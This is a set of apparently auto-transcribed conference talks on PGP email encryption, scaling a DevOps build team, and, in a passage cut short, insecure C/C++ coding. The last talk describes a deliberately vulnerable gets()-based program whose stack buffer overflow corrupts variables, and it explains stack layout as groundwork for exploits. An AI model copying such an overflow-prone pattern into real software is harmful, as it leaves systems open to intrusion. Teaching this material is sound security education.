doesn't grow, the whole message doesn't grow for every new recipient. So when I have multiple recipients, as I said, just the message will be encrypted by a temporary key. And for each recipient, there will be the information encrypted for this key before each recipient. So it will grow a little bit, but just some bytes. So we can see that. We can see it here. So if I break it up and to show you some other examples, so let's, I have some test accounts here, let's send it to, to, to somebody where I have a rule where I say when I send it to this guy, I want to have it encrypted. And then I send it to another guy. And there I have the rule never encrypted to this one. And you see here, for example, that internally I have a violation of the rules that are there. Usually you don't need rules if there is this auto encryption mode. But as I said, this auto encryption mode is new and will be new in Enigmay 1.7. It's only in the nightly builds on four weeks it will be there before you needed rules. And with rules it was more, it was more likely that you get some, some conflict, et cetera. So then I could raise in this conflict by hitting here and say, well, I don't want to encrypt or yes, I want to encrypt in this case. And if I don't have in the receiver, so let's take a new receiver, take a gym hook. I don't know why this name comes to my mind. I don't know anybody of that from the email dot de. And I want to send this to this guy. This guy is not known. So I get an interactive dialogue. And this, in this interactive dialogue, they try to, to find this receiver because it might be that this is a different name of somebody I know. Let's not show you too much of all my keys. So if I send this email to somebody where I have another key, I can select it easily here. So, but if I don't know this guy, I go here, download missing keys. Oh, yeah, I'm offline right now. So, and then I got a dialogue to look at the public servers. Do I have this key? And then I can use it. And then it's part of my key list, key management. And then the next time it will be automatically encrypted when I send to them. So it's pretty, pretty convenient to add new recipients. And, yeah, it's not all, but this is a major interface we use right now. Or we will use with the next version or with the current nightly build. So let's see. Three more minutes. Any more questions here? Yeah. Do you know how many, I mean, because most people these days use, well, I do email on web. Oh, yeah, yeah. How about, how about email on web and smartphones and web mailers, et cetera? Yes. That's the question. And so let's get back to my slides. Ah, here's also one recommendation which I didn't mention yet, which is that when signing emails, it might be that you use by default, char one with the broken hashing algorithm. So you would have to set up some setups. For example, on the Windows system and maybe on other systems to use a better algorithm for signing. So it's unfortunately, the defaults are not that good. I have to double check with these guys. And, yeah, so this is also one thing. So let's see on the other examples. No. Where is it? So the, yeah, the best support we have, as I said, for Thunderbird and Apple, Apple Mail, Outlook and smartphones, it gets more complicated. Android C Open Keychanges, some GPG tool support for iPhone. And for web mailers, look at the website MailVillop. You will find it if you search for that. That's an interface that wraps Google and Yahoo, et cetera, so that you can use it. They are all not that convenient. So unless you fix that in the next days, I hope so. So let me summarize. PGP can be used, but can be inconvenient. The best support we have currently with Apple and Thunderbird, that will change. I know, for example, the development guy of Open Keychain with the Android add-on for PGP. And he, for example, got sponsored by Google three guys for three months to fix some of the stuff. So there is some support, some support by also American companies to improve the situation. Let me also say in general, the amount of people that are behind some of these inventions is incredibly small. There's only one guy maintaining the underlying general tool, GPG, which almost all use. And Enigme, where I contribute, I thought, oh, there will be 10 or 100 people. No, I was a second contributor. I became the second contributor of this beast. And so, yeah, it's incredible how few support we have there. And if you are really keen on helping, come to me or go to the websites and offer your help. We need it. We need it desperately. Okay. Then some open issues. As I said, the further goal is to support on all platforms PGP MIME so that we have a standardized formal e-mail protocol also on smartphones, et cetera. However, there will be one problem. To read the email, you need the private keys on all devices. So, well, a smartphone is very smart in these days. But that means something that for the private key, you, well, if you lose your smartphone, that might be an issue then. And as I said, you can revoke keys so that no longer people send you these e-mails, but for the old e-mails with the, and if somebody has that key, they can read that. So, you have to be careful. Well, they can, he can read it if they have the passphrase. So, there's also a password. There's one reason why you have to use a password together with the key. So, if somebody gets the key, they still have a problem to read it. So, there are still some issues to solve. And then one issue I should also mention, if you receive encrypted e-mails, and the question is, when you decrypt it and you save then the e-mail or you leave your browser, is this, is he decrypted? Or the, the former encrypted e-mail saved in your, on your disk? So, that has an impact because, for example, if you save and store your e-mails after receiving them, always encrypted, you have a problem to search in e-mail contents, which is one of the, the most often feedback I got from people who wanted Switzerland. So, I can no longer search in e-mails. Yes, you can, but that's also a lack of the, the mails that they support an option to say, well, let's store the decrypted version in our folder because the major problem we want to solve now is communication. People who, who, who, who, who, who violate privacy and at rooters, et cetera, so on communication channels. But of course, there are also applications where you want to say, when I save the e-mail, it should still be decrypted. For example, if you have to hide something for, for your family or for others who, who, who can have access to your e-mail account. Decide yourself whether it's worth it. I hope this was some insight. I hope also you saw that if you're, at least, you some mailers, it's not that difficult as you saw. My major goal is to make it that convenient that all people use it because it's not more convenient than without encryption. So that, that would be the goal, but it's a long path to there. So please help us and thank you very much.
|
Are you as fed up as I am about all the privacy scandals by both secret services such as NSA and GCHQ and companies such as Google, TV companies, and others? But what can we do? Well, Martin Fowler recently gave an important keynote with the working title "We are not just code monkeys." It talks about the role we as IT guys play, could play, and should play in this world. So let's use our knowledge and responsibility. The goal for this session is to get a better understanding about the problem, the tasks, possible solutions so that we IT experts can finally rescue the world. It's not a talk, it's a starting point.
|
10.5446/50853 (DOI)
|
Can you hear me okay? Okay, so, this is about development operation, and in DevOps, we deal with stuff like this, and have to be agile and think on our feet in order to react quickly on stuff like this. But I think this will work with Plan B. Thank you for staying this late in the conference. This is actually the last talk of the day. This presentation is, I labeled it, a peek into an enterprise development operation team. So many are familiar with the term DevOps. My name is Nils, and I'm the manager for the Build Services Group in Petrel, which is a DevOps team. Let's see if this works. All right, so, just a little bit more context. Petrel is a product that we build in the DevOps group. It's a platform in the oil and gas industry. It enables experts to work together and make the best possible decisions all the way from exploration to production. So what that means is that the software models the earth so that the geologists can get computerized models out of the earth. It also goes through reservoir characterization and modeling and also through production. So production engineers can find out where to optimally produce oil and gas or carbon. We also have an SDK on top of the platform. It's based on the ocean technology, and you can learn more about that at the stand down in the galley here. That's a little bit about the context. So it's Petrel and its ocean. This slide here is, and this whole slide sets, I'm gonna try to lead you through a journey that we've gone through with the development operation team. And basically the result of that journey is that we've been able to increase our customer responsiveness with improved quality while we've been growing this platform footprint. So the graph on the left hand side displays the trend as far as having a daily installer available. You see that the success rate of the installer has gone up but also the variations of how often we can get a successful installer has also gone down. You can see in there on the left hand side. From a client perspective, we've been able to give out fixes more quickly as a result of this. The chart on the right hand side is more of an internal view. This displays how we've increased the number of automated tests while we've also increased the average success rate of the builds themselves. And at the same time, we've also increased the success rate of the developer and at the same time, we've also reduced the build time. So these are sort of internal KPIs. So I'm just gonna take a quick break here. In the audience, who's in the DevOps team? Okay, so a few. In the audience, who's in a development organization with more than 50 developers? More than 100 developers. More than 200 developers. Okay, so then you're gonna understand some of the things that I'm gonna be going through. My group, like I said, is a Petroleum Build Services group. Our bread and butter is Development Environment and Hosting. It's about configuration management. It's basically source control. It's running the continuous integration tools. And it's also licensed administration of this development environment. So specific things. We set up team branches. We set up release branches. We do auto integrations between these branches. We offer personal builds. We also have team builds or specific feature builds and integration builds, as well as the setting up the daily installer. So as part of the installer work, we create the installer by using templates. Because we also have an SDK on our product, we reuse these templates for internal and external use. We also put in health checks to make sure that it's installed on the hardware that we recommend and within the bounds that we recommend. And we also offer extensions installers. We also do a lot of release coordination. In short, we can separate our development cycle into pre-alpha period, alpha period, beta period, and to get to the commercial. And so there's a lot of scheduling involved, alignment of the builds to get them to integrate at the predefined milestones. We also whitelist external software that we use internally in the product. And because we do all these builds, we also provide KPI metrics to the organization and also documentation overall to the development organization. The last piece is sort of a thread that goes through the presentation. It's a big focus on continuous improvement. Both on the build side and the IT environment side. So specifically, it's about automates, where it's feasible and where it makes sense. Training and documentation of the developers. And alignment with corporate IT. So maybe some of you have experience with data centers. We sort of have our own internal data center. And in many scenarios, it would be as if we were dealing with an external data center supplier. Because we have all this data of builds coming in at fairly fast rates and with a big breadth, lots of data coming in. We also do a little bit of big data analytics. So we take a look at this to see how can we better create these workflows for personal builds for quality gates and stuff like that. Assuming certain things about the organization. So there are certain ways you can do that. You can have questionnaires, you can have surveys, you can have gut feelings and stuff like that. But we also have data that we collect and we also look for pattern analysis in our database. All right, so the challenge that we were facing before the transformation was basically split in three. Organization, process and technology. From an organization perspective, we're a geographically distributed team. As you can see in the map there, you have quite a few time zones. Which is a challenge in itself when it comes to collaboration but also cultures and schedules and so on and so forth. Another challenge was the definition of a quality gate. What does green mean to you? It's not necessarily the same definition as what a green build means to somebody else or a test even. You can do this at all different kinds of granularity levels. Units, module, integration, all the way up to the product. Schedule alignment. Our platform also plugs in with other products. Which may have a different schedule than the schedule that we have for the platform. So there is product coexistence in the system as well. Although the organization as a whole is actually quite good as far as software development practices and TDD and agile practices, there's also spread within the team because we're so big on the maturity level of practicing these techniques. This software itself is also tightly integrated. So you can basically carry a workflow through many of the vertical domains. So it's a very integrated product. And because of that we have dependencies both on the business side and on the technical side. And because the software has sort of gone through acquiring smaller companies and acquiring deep science from other places, we've also sort of acquired a tool stack that's also been a challenge in itself because it's good systems by themselves, but don't necessarily work that well together. Alright, so in this environment the challenge was to get predictability, traceability, repeatability, and quality out of the system. So before I go into how we actually attacked this challenge, I need to go through a couple of or a few preconditions and guiding principles. Number one, our software or our platform is, the software architecture is layered, it is modular, and it's extensible. The software process I would say overall we're practicing continuous integration and there is buy-in in test automation and there's a general consensus in the organization that test automation is a good investment. So with these building blocks within Agile software practices, I also want to highlight the fact that to do change management within the organization is also something that actually developers are quite used to. And because we do it quite often, it's also sort of a motivational factor because people they like to develop on the latest and greatest of technology. So basically you have the motivation aspect as well. And from management we have buy-in and support because of the communication channels that we have. So from an organizational perspective we basically have top-down support and we're able to implement from the bottom up because of the motivation generally in the organization. So these are sort of the preconditions. For the development operations team we have some guiding principles. It's automation. It's being able to design the system for self-serviceability, meaning we're not putting ourselves in the critical path of tons of developers. They can basically serve themselves. Within the group we have a strong level of knowledge redundancy within the group. And there's also a focus on service continuity. Because we're physically located in Norway, you can't really detect that from the other centers because we're on holiday for instance. We have service continuity plans in place for that. And last but not least there's a big focus on continuous monitoring of the whole system which feeds into the continuous improvement cycle. Alright so that was the context, the product, the situation, the challenge. Then now the presentation goes into what is it that we wanted. So just a brief explanation of our build system. So we have a bunch of libraries. First and second and third party libraries. We have our platform that we build and then we have because of our extensibility framework we have a bunch of internal plugins that we bundle with the platform when we ship the DVD. All these developers are also outlined the phases, the pre-alpha, alpha and beta. And the whole point of starting early with all these developers is to get early feedback in the build process. And then when we get to commercial we have sort of an equivalent to iTunes. We have an ocean store where you can publish your plugins and basically be an independent software vendor on top of our platform. So there's a bunch of build ripples. In between these build ripples we've invested quite a lot on quality gates. And I'll get back to that in a minute. So basically what we wanted out of this continuous delivery build system was we wanted to facilitate a Ferrari. We wanted to facilitate speed. We wanted to go through this very quickly if we had to. We wanted to protect ourselves against the ignorance of the quality gates. So we had to have trust in the quality gates and they had to be predictable by everybody. But we also wanted to avoid congestion in these quality gates. We had to be performant. They had to be easy to understand. We couldn't create anything that required the DevOps team to go in and explain the logs and so and so forth. Because then you're creating waste in the system by people waiting on each other. And it doesn't scale very well. So I separated into technology process and organization from the technology. Quite simple. We wanted fast builds. And because of that we needed dependency awareness. We wanted the gates to be smart. So we wanted smart gated check-ins. And we wanted the tools to be uniformly distributed against all the machines that we have in the third park. As well as the desktops where developers are working locally. Across all the centers that are contributing to the platform. From a process perspective as I mentioned in the previous slides. We wanted early feedback. And we wanted the release days to not be stressful. Raise of hands. Who thinks it's stressful? It becomes a little bit stressful in the organization when you're one week away from release time. A few. So that's what we wanted to avoid. We didn't want this stressful release days. We wanted to practice this process throughout the development cycle. Where we designed, developed, test, release, adopt. And all this through this stability promise. Throughout the pre-alpha, the alpha, beta to the commercial release. From a process perspective we also wanted traceability and continuous monitoring. Because we wanted to be able to adapt if we had to. So we still wanted this element of continuous improvement in the process. So from an organizational perspective, what that really translates into is we wanted people to have clear roles. Clear responsibilities. There's no question about if the build breaks, who does what. What does this mean. So on and so forth. And from a development operations perspective we wanted this self-service mentality. So whatever we did next time, we didn't have to go into this servers to produce some of these logs. To give to the developers. Because they would be already attached with the build log. That's just one example. Because we wanted within the DevOps team, we wanted sustainable working hours. Like I said in the map earlier in the slide set. We produce time, or we support time zones all the way from Houston to Beijing. So that's pretty much 24-7. And also because of that and because of the continuity objective, we had to have knowledge sharing within the group. So we had to come up with some sort of a system where we could knowledge share without having to shadow each other at all times. Alright, so that was the challenge. That was the wish list. So then the question was, and I mean you've probably been inspired by many other things from the other talks here. You think, yeah I want to do this. But we're a big organization. How do you do this? How do you do this with hundreds of people? So I'm not going to say that this is the way to do it. But this is what we did. We realized that the road to continuous delivery would be a long walk. It would be driven by constraints, by business. We had to have annual releases. This is sort of like fixing an airplane while you're flying it. So we had constraints. But ultimately we wanted, from a technology side, an agile and intuitive traceable build system with minimal human intervention. And we wanted this to be a part of the culture, this whole notion of continuous delivery. So we divided it into incremental steps. Phase number one was all about predictability in the system. I'm not saying that the system wasn't predictable before we did this, but what I'm saying here was that the focus was on predictability in the system. So specifically on the technology side, for instance, we wanted server and desktop alignment. What that means is if the build error happened on the build server, it would be reproducible on your desktop as well. And it would be like, oh, it's only happening on the server. It doesn't happen for me, a.k.a. it's not my responsibility. So we had to invest in that. We also did a lot of investment in test automation. And in order to achieve this, we put aside a task force that really went after this. Phase number two, at that point, we had trust in the system. We wanted the predictability that we wanted, and we wanted efficiency out of the system. So from a technology perspective, build optimization. And from a process perspective, the investments that we made in the previous phase on test automation, we wanted to preserve those. So we created a sort of a guideline that we named Keep It Green. This was a rule set of, I think it was like between five and ten rules that basically everybody had to follow. We printed those on flyers. We went all through the organization to basically protect that investment that we did in the previous phase. We also, in order to support this initiative, we also created something we called Build Buddies. So these would be looking after builds that sort of fell in between the cracks of the system, even though people were supposed to take ownership. There might have been still unpredictable things in the system that basically they took care of and communicated back to the DevOps team. So phase two was about efficiency, getting speed. Phase three was about effectiveness. Even though in efficiency, even though you do something fast, it doesn't necessarily mean that you do the right thing. So in phase three, we, from a technology perspective, we focused on trying to share these binaries that we had already built in the server park with the developers so that it didn't have to build them locally. The gates that we had invested in in phase one and sort of retained in phase two, we wanted to automate them and have automated gated check-ins in phase three. And last but not least, from an organizational perspective, we created something that we labeled the Build Federation. Build Federation would basically be the DevOps team being a central team that is responsible for the rules, for the entry into the server park, and sort of the nuts and bolts of the system. And then we would have deputies with the mandates to make build decisions out in the different teams. So that was also one effort that was put in place in order to make the system scale. Okay, so in this slide, I've made them into, it looks like maybe it's almost like three separate phases. Many of these phases had elements of phases above and beyond, or above and below them. So if you go around the organization, I'm not so sure if you'll find these sharp lines in between phase one and phase two and phase three. But from an overall perspective, this was basically how we broke the challenge down into incremental steps. All right, so a little bit more on phase one then, quality gates. There's been lots of talks about TDD and testing and how to do it and how not to do it, even the previous presenter here had some thoughts on that. This is more about how you actually do it from an operational perspective. You've probably seen this pyramid before. You have a thick layer of unit tests that are cheap to run, really fast, easy to develop, don't really need that much mocked environment. Maybe it doesn't even need data and stuff like that, and you create lots of them because they're cheap. Second layer is you have modules, then it's testing the module by itself, maybe via an extensibility interface. Maybe you start merging modules and you mock a little bit around, pull in some data, start twisting and turning these modules into stressful environments. That's layer number two. Layer number three is, not necessarily with the user interface, but at this point you bring up the application, you run through some workflows. So again, I have to emphasize that the platform is very integrated. This is very important for us to run workflows because the module tests in isolation might all be green, but when you put them together, they're not necessarily green because the interfaces are wrong, or they're not passing over the correct data or syntax and so on and so forth. The last layer is, I call it UI. So there are many frameworks to be able to support UI. The focus in our organization was at this level, the competency and the organizational responsibility switched. It switched from the developers to the quality assurance guys, to the testers, and they are typically domain experts. So they know all this oily stuff that the developers might not necessarily have deep knowledge of. So they twist and turn the software by using UI tests and also then testing the top layer of the system. Alright, so then when we invested in this testing architecture and defined these quality gates, we also wanted a metric to ensure that we're on the right track here. So one way of measuring that is to measure the number of tests that you have in the system. That in itself may not necessarily produce that much value. So we also decided to track code coverage because that meant that we were adding value to these new tests. They were creating a different footprint that the previous tests were not necessarily giving. You might also argue that that in itself is also not really a good KPI or a metric to support the quality of your quality gates. What I didn't put in here was that the number of defects at the client's site, which I guess would be the ultimate way of measuring these quality gates, also went down. So we knew that we were doing something right. We had some metrics to try to capture our goals and we put that in place and then we monitored that. So basically in summary, the investments in automated testing was about agreeing on the quality gates and agreeing on the test architecture. And the DevOps team ensured that whatever they were doing in these even remote places away from Norway produced, we were able to reproduce in the servers. And then also we put aside a governance plan to protect this investment that we made. And I mentioned KPI Green was one of the efforts. So that was phase one, predictability and quality gates. Phase two, I said, was making the bills more efficient. So very simply said, it was from going from a monolithic model with sort of a big gate at the end of it, maybe even manual, to a modular. What I haven't modeled into this picture to sort of spare you my drawing skills was the interdependency between all these modules. But the idea was basically to have quality gates at the end of each module and also as they were integrated up in the system. The metric that we used for this is quite simple. It was the time that it took to build the system. And as you can see here, and I put this in here on purpose because this was sort of working on moving parts because as we were going through this transition, we were also growing the platform. So you see the lines of code was actually going through the roof as we were actually decreasing the build time. So it's almost like an oxymoron. But that was the achievement. And in summary, the build optimization, we looked at everything all the way from compilers to modularization of the system. A very good system on dependency management, algorithms that could spin through the whole system and compute the dependencies online and only rebuild what was necessary. And this goes beyond what Visual Studio can do and also tools like Incredibild and stuff like that. Concurrency was also a big focus on our side. And then we got incremental build. So we basically went from hours, hours and hours. I can't really say exactly numbers, but let's just say hours and hours down to minutes while we were growing this platform. In phase three, we had a fast build, but we wanted to make it more effective. We wanted to do the right things at the right time and so on and so forth. So I put this picture in here just to remind you that it was a globally distributed development team. So it's basically spread around all the way from Houston to Beijing with the DevOps team sitting in Oslo and the local data center as well. So to make the builds more effective, on one side we focused on hardware. And we looked at our server utilization and this is not necessarily load balancing within the continuous integration tool because it does that fairly well by itself out of the box. But this was more to look at what do the developers in Houston need when they get up in the morning as opposed to when we in Europe leave for the day as opposed to what sort of nightly builds to the Asia part of the organization need. So this was really looking at the schedule overall, both from a deep technical perspective all the way down to the metal. But also from an organizational perspective. So as you can see in this graph here, we were able to get these loads that were swinging. So basically we had parts of the day where we had huge build queues and people were waiting on these fast builds. They were really fast, but there was still, because we hadn't scheduled them optimally, then people were still waiting. So we were able to get that variance down and got into a good steady state load on the servers. And as you can see here, we didn't really increase the server part that much. So only marginal increase of the server part. So it wasn't that big of a capex investment. Sort of on the software side. So we're getting more builds of the system, we're building them right, we're building them fast, we're building them at the right time. But the DevOps team is still sitting in Oslo covering all these time zones. So we put a big focus on load balance from an organizational perspective as well. And that basically means training. So we trained these deputies that were sitting locally to all these different teams to understand the system and to understand how the internal configurations of the system actually worked. So that they could self-service themselves, or that they could service themselves out of our business hours. So you see that the training time that was needed went down while we were actually getting more and more developers in the system. So again, we were scaling very well with this organizational model. Since summary, we were load balancing, leveraging hardware and people. One thing that I didn't mention was that we also put a big focus on backup management of the DevOps team itself and made it visible to the other teams. Did reviews so that a selected number of people, the deputies that is, would understand what was in our pipeline coming up, both on schedules and improvements. And we put a big emphasis on making the reports intuitive. So when you look at the report, you didn't have to pick up the phone or send us an email because it was clearly written in the bill log, what was wrong with your submit. On the documentation side, we made a conscious decision to have that crowdsourced, although it was refereed. So basically anybody could contribute to the documentation, but it would be refereed by the bill team. And last, as I said also, build scheduling was really starting the right builds at the right time. All right, so the last aspect that I was going to bring up in this transformation goes across all the phases, and that was making the DevOps team itself more effective. What you're seeing here on the screen is basically the work steps of one of the workflows that the DevOps team has as its, or her job. You basically receive the code, you compile it, you unit test it, you distribute the module, integrate it, you integrate, and you do some regression tests on that integration, and then you distribute it. So those are basically the work steps. On the different contexts or devices that you're in, in these different work steps, it might be in the code repository, an allocated service space, maybe a continuous integration software repository, or on a network share. This is just an example. So as you walk through one of these work steps, you can also highlight areas where maybe you spend more time than you either are told it should take, or that you think is taken too long because of low hanging fruit, or because of the technology itself should perform better than that. So basically, you walk through a number of work steps like this. Second thing is, we took a look at what is the nature of these work steps, what is the volume of it, what are the varieties in these work steps coming in, what sort of skillset is required, and what sort of flexibility is needed by the people that actually give these work steps or these requirements to us, and how do we utilize the assets. So the assets is both on the hardware and on people. So then you end up with maybe some more project, one of a kind sort of thing where you integrate a huge module that you're only going to do once or maybe once every year. Certain things are more of a batch nature, whereas other are clearly continuous flow and they should be automated. So you basically go through the work step and you find areas that you go through like this, and then you implement continuous improvement actions accordingly after you've gone through this. Alright, so then we're actually at the end of the slide set. So to summarize, like I said in introduction, we increased the responsiveness quality while we were growing the platform footprint, and with the KPIs that I mentioned, responsiveness to customer, and also quality overall. So how was this achieved? I would say then to summarize, it's because of the culture of continuous improvement in the organization, sort of triggered this whole investment, and throughout both the backbone in the organization, but also while we were learning doing all these continuous improvements, we acquired this excellence in change management. As I mentioned before, we did lots of things, incremental things within technology, within process, within organization, and we did this all while we were sort of flying the airplane. So we're fixing the airplane while we were flying it. So very good risk plans and change management plans. Also, another area that I would like to highlight that I think is important in this achievement story is the continuous effort of attention on architecture. So this is both on the build architecture that basically follows the software architecture of the product itself. So you have the product itself, build architecture, and test architecture, and all these three follow each other through this attention on architecture in the system. And all this investment that we're making, we're continuously monitoring through our metrics that we decide on, and sometimes we bring out old metrics and bring in new, but some of the bigger ones, like for instance, the percentage of daily builds is still there as one of the major metrics. But this notion of continuous improvement and continuous monitoring is very important for this culture of continuous improvement because the continuous monitoring basically drives our backlog and both in prioritization and in sort of a roadmap perspective. So that was it. Any questions? Yeah. Yeah. Yeah. Yeah. So that's a good question. So the question, I'm not sure if everybody heard, the question was, this is, I think you said something else, but I understood it as this is sort of a simplified version of everything. If I were to do it again, would I do the same thing again? I would probably do a few things different, but would they, the things that I would have done differently, would they have made things go faster, would they have been more effective and so on and so forth? I'm not so sure. So I think the answer to the question is actually no, I'm not so sure if I would do so many things different. But I have to highlight here that this continues improvement. I mean, everything was broken down. We had a backlog that was prioritized just like any other scrum processes. So we ran this actually as a scrum process. If we saw that, we started the project and we said, we want to go this way. We think it's this way here. We were very agile and we were able to move very, very quickly. We could change our backlog within weeks and we could do different things. We also tried to isolate the test. Maybe that's one area that we could have improved on all the way from the very start, defined the isolated tasks that could be done by somebody else because then you can hire a consultant and you can ramp up the effort and get things faster, get things done faster. So that's one effort. But in general, being agile in the DevOps team, so basically practice scrum within the DevOps team, I think this may be a little different from what IT people think. This is my impression anyway. So I didn't hear... Yeah, okay. So the question is about the ratio between the DevOps team and the developers. So I'm not sure if I can disclose all those numbers, but it's a handful of... The DevOps team is a handful of people and the number of developers is hundreds. So that's sort of the ratio. Then you get a feel for the ratio. And I have to say that the headcount of the DevOps team has stayed the same, whereas the number of developers has... has a... multi... I mean, it's... yeah. Yep. Any other questions? Okay. Then I say thank you very much and enjoy the holiday weekend.
|
Developing a multi-million LOC highly integrated software product across several locations in numerous time-zones introduces multi-dimensional challenges for the developer operation. Ensuring a frequently available build, configuring and parameterizing tools effectively and efficiently, and guaranteeing that the right content is included for the right release are the top three challenges. Furthermore, to optimize the operation, a reliable and deterministic development environment as well as a lean release coordination structure must be in place. This can be obtained by designing a development operation (DevOps) with a focus on self-service and automation, coupled with tight integration with the developers to continuously optimize the flow of features through the build system to the final artifact delivered to the customer. The Petrel Build Services group is a development operation (DevOps) team offering a range of services for the Petrel E&P software platform. Automated builds, a scalable test and debug environment, tool stack support, code diagnostics, and daily installers are key deliverables. In less than 10 years, the size of the organization being supported by the Build Services group has grown from a team of 10 to hundreds of developers. This has been achieved by maintaining a flat headcount in the group.
|
10.5446/50854 (DOI)
|
in 20 now. So welcome to this session about insecure coding in C and C++. First of all, I have to make a small disclaimer because it's not that much C++ here. Everything I'm talking about is also relevant for C++. But there are few or actually nothing that is specific for C++ per se. And that's quite typical when you walk down in the stack and close to the hardware. The other thing is that I kind of promised lots of assembler. But when I compare it to a few other talks that I've done, for example, test driven development in assembler. And another talk I did last year, where 90-minute talk where I think 60, 70% of the slides were in assembler. I have to admit it's not a lot of assembler, but it's enough. So some assembler in this talk. But perhaps more important in the program, it's impossible to see what kind of level talks are at because it's not written in the program. And when I sent in this proposal, I deliberately set it to introduction and a general kind of overview of how to do insecure coding in C and C++. So if there are any deep experts in hacking programs on machine code level, you might be disappointed. It's not an expert talk. It's not even advanced. It is a general introduction to a lot of concepts that are useful to know, both if you want to write insecure code, but also if you want to write secure code. So it's an introduction talk. But just checking, is there any kind of hackers in the room that really know this stuff? Okay. Just anyone that know about cold injection? Yeah. A few people. Anyone that have done it in the last 10 years, because everybody did it when they were kids, but in the last 10 years? Okay. Not so many. But that's good because then it's nice to have this introduction level. So being stupid is a privilege to some extent. But you can also do dumb things intentionally. And you have to admit that these guys, these guys, they do actually know a few things in order to do so many stupid things that they do. And I hope this talk will also focus on knowledge-based ways of doing stupid things in C++. So there is nothing special with my machine when I'm referring to it. Apart from it's just a 32-bit Linux kernel, fairly recent, with a fairly recent compiler, and a fairly recent Ubuntu distro. I wrote the main of this talk in March. So if I wrote the main of this talk now, I would have just upgraded it. But it's nothing special in there. So that's not where to look for faults, etc. This is something that you can do on all types of machines and operating systems and compilers that you find out there. So in this talk, I will briefly discuss the following topics, StackBuffer overflow, also called Stack Smashing. How the call stack and activation frame is working. I just have to go through that, even if most people have a reasonable understanding of how it's working. Well, most C programs have a reasonable understanding of how it's working. I need to go through it because I will refer to a few of those things later when I explain how to write exploits, how to do arc injection, code injection, how a few protection mechanisms are working. There is some feedback in the audio. I'm getting some feedback in the audio. Okay, it's probably good. And then some protection mechanisms like ASLR, StackCanaries, and a fancy mechanism called return-oriented programming. Who knows about return-oriented programming? Okay, three, four people who have not only heard about it, but actually read about it and studied it a bit. Nobody, good. Because I don't know very much about it. I wasn't sure if I was going to include it because while I think I understand it, I don't understand it well enough to explain it really well. So I've just done a very brief explanation of return-oriented programming. Then I'll show some things about how to write code with surprising behavior. Talk about layered security, information leakage, how to patch boundaries, and in the end I will do a summary where I summarize a few tricks for writing in secure code. All of this in 60 minutes are actually 55. So we better get started. But now we understand it's an overview. It's not going deep into anything really. But take a look at this code first. It's a small program. Of course, it's a contrived example. I'm using it just to illustrate a few other concepts. So I had to make some stupid stuff in there. And of course, the key thing here is the use of gets and the buffer, the response buffer. That is what we're going to have fun with. And I guess we all know that gets is a function that you should never use. And it has been removed from the language now. But it's still a nice function to have there when you want to kind of explain in a simple way how stack smashing can be done. There are so many other ways you can do it. So don't be confused by me using gets in this example because there are hundreds of other ways you can do exactly the same thing. Yeah. Of course, it doesn't use gets and that's good because it has been removed from the language. But for now, we are going to use it. Let's see what happens when you try to execute this code. So it was supposed to work like this. When you run the program, it's asking you for a secret. And if you type in your name, which name should I type in? Anyone remember the movie? Oh, you're close. But the hacker was named David. So you try with David first. And David is not the keyword. So access is denied. And the operation completes. Nothing has happened. Okay. So that was how it was supposed to work. If you type the wrong secret. But if you went into it and typed the right secret, Joshua, the name of the professor, then access was granted to the system and two missiles were launched. Operation complete. And now we are going to look at kind of the simplest way of exploiting this because if we type in a very long string, bad things will happen. And in this particular case, my machine, I got access granted. Even though through comp didn't work. And it was launching a few missiles. And operation was complete. Did anyone see something strange here? Yeah. We got both access granted and access denied at the same time. So not have we only kind of launched how many millions of missiles. But we have also seemed to create a program kind of messed up the program in such a way that it becomes unstable and seemed to both pick this path and this path at the same time. Now, for those of you who have seen some of my previous talk last year, you might remember why it is like that. I will come back to it and explain it. But first of all, I will look at this one. Why did we get so many missiles? And in order to understand, to kind of explain that phenomenon, we need to understand how the stack is working and what is happening when the program is executing. So due to an overflow, what has happened is that we have messed up, changed the value of allow access and we have changed the value of end missiles. And this is the strange thing that we will look at later. So what we just saw now is what is typically called Stack Buffer Overflow and sometimes Stack Smashing. There was a famous paper that came out in the 90s called Stack Smashing for Firm and Profit. That in some way changed the computer industry because suddenly a lot of attention came into this point that we need to kind of write bug free code and certainly not allow Stack Buffer Overflows because there are so many things you can do. And while it is common to hear C and C++ programmers discuss with each other and say, oh, this is a stack variable and this is on the stack and there is a call stack and activation frame, etc., it is important to know that the standard never says anything about the stack. So although it is very common for a C program and C++ program to actually use a call stack and activation frames when executing, this is not something that is mandated by the standard. So if the compiler or the optimizer can create a similar behavior without using a stack, it is allowed to do so. So this depends very much on the optimization level. But from a conceptual point of view, it is reasonable to think about an execution stack that works approximately like I am just going to describe now. And it is not. While I have been doing this on a Linux on an Intel CPU, this is approximately the same as all typical CPUs are working. So for what happens here when we start the program is the operating system is loading the program into memory and then it is passing control to usually something called start, which is often in a C runtime library. And inside of start, it is not doing very much. It is setting up the call stack, maybe initializing some variables, preparing for dynamic memory allocation, etc. But very soon it will jump into main. And once inside of main, it will start executing the assembly instructions that are represented. That is a representation of this code. So the call stack has been set up before we enter main. And it is useful to draw it like this. High address, low and low address on top, because nearly all call stacks, they grow from high address up to the low address. So if you try to draw it all the way around, it is difficult to reason about it, at least sometimes. So the first thing that happens when it is jumping into main is that the start, the runtime start library has pushed the return address, kind of the next instruction that is supposed to be executed when main is finished. And so when, so this is coming in here, the return address, the next instruction in start. And once inside of main, main will then set up its own activation frame by putting a pointer to the previous stack frame so that it can be restored. And now it has its own activation frame that it can use. So when it is supposed to execute puts, it will first put a pointer to the string onto the stack and then jump into and then the return address, the next instruction in main that should be executed, which is this one. And then it will make the jump into puts that can do whatever it wants. But it is usually just building another activation frame and behaving like others, but it doesn't have to do that. And when puts is finished, these things go away, kind of like garbage collection, not in use anymore. And before calling authenticate and launch, the same procedure happens again. We push the return address of the next instruction, which is here. And then it jumps into authenticate and launch. And then restore the pointer to the previous stack frame. And then allocate space for these local variables. And local variables or stack variables is not a very exact name. So if you are wondering how this is working and you use those inexact names, you typically end up in discussions between people that is not necessarily experts in the topic. So if you really want to go to the places where they discuss how this is really working, you should use variables or objects with automatic storage duration, because that is the word that is used in the standard. And it's in some way a much better word because it doesn't indicate that this is going on the stack. But now you see we have put stuff here, allow access and miss all response. Anyone see something that might be a bit strange there? The order? Yeah. So it's, I'm not trying to pick on you there, but thanks for playing. It's very common for programmers to believe that they have a correct idea about how things are laid out on the stack. But there is no reason why programmers should be able to reason about that because as soon as you increase the optimization level, for example, things will be rearranged. Some things will be stored on stacks. Something will never be, never get actually a physical memory or whatever. And these kind of rearranging, the order is very typical for all compilers. They do that all the time. So there is no correct order in this particular case. But this is what happened, exactly this happened on my machine when 